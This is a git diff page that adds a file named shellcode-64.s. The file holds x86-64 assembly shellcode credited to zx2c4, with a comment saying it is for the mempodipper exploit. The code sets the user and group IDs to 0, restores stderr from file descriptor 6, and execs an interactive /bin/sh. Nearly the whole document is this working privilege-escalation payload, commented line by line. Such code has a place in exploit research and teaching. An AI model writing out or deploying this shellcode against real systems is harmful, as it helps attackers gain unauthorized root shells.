diff options
Diffstat (limited to '')
-rw-r--r-- | shellcode-64.s | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/shellcode-64.s b/shellcode-64.s new file mode 100644 index 0000000..2514ed2 --- /dev/null +++ b/shellcode-64.s @@ -0,0 +1,49 @@ +BITS 64 +; This shell code sets uid and gid to 0 and execs a shell in interactive mode. +; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper. +; +; by zx2c4 + + +;setuid(0) +xor rdi,rdi +mov al,0x69 +syscall +;setgid(0) +xor rdi,rdi +mov al,0x6a +syscall +;dup2(6, 2) +mov dil,0x6 +mov sil,0x2 +mov al,0x21 +syscall + +; execve("//bin/sh", ["//bin/sh", "-i", 0], 0) +mov qword rbx,'//bin/sh' ; rbx = //bin/sh +shr rbx,0x8 ; remove leading / from rbx +push rbx ; push rbx to stack +mov rdi,rsp ; set rdi (arg 1) to top of stack + +xor rbx,rbx +mov bx,'-i' ; rbx = '-i' +push rbx ; push rbx to stack +mov rcx,rsp ; set rcx to top of stack + +xor rax,rax ; rax = 0 + +; so at this point: +; rdi is a pointer to '/bin/sh' +; rcx is a pointer to '-i' +; rax is null +; since they are all the same size, we'll push them on the stack +; and then it will be an array: +push rax ; push rax to stack +push rcx ; push rcx to stack +push rdi ; push rdi to stack +mov rsi,rsp ; set rsi (arg 2) to top of stack + +xor rdx,rdx ; rdx (arg 3) = 0 + +mov al,0x3b ; al = 0x3b, which is the exec call +syscall |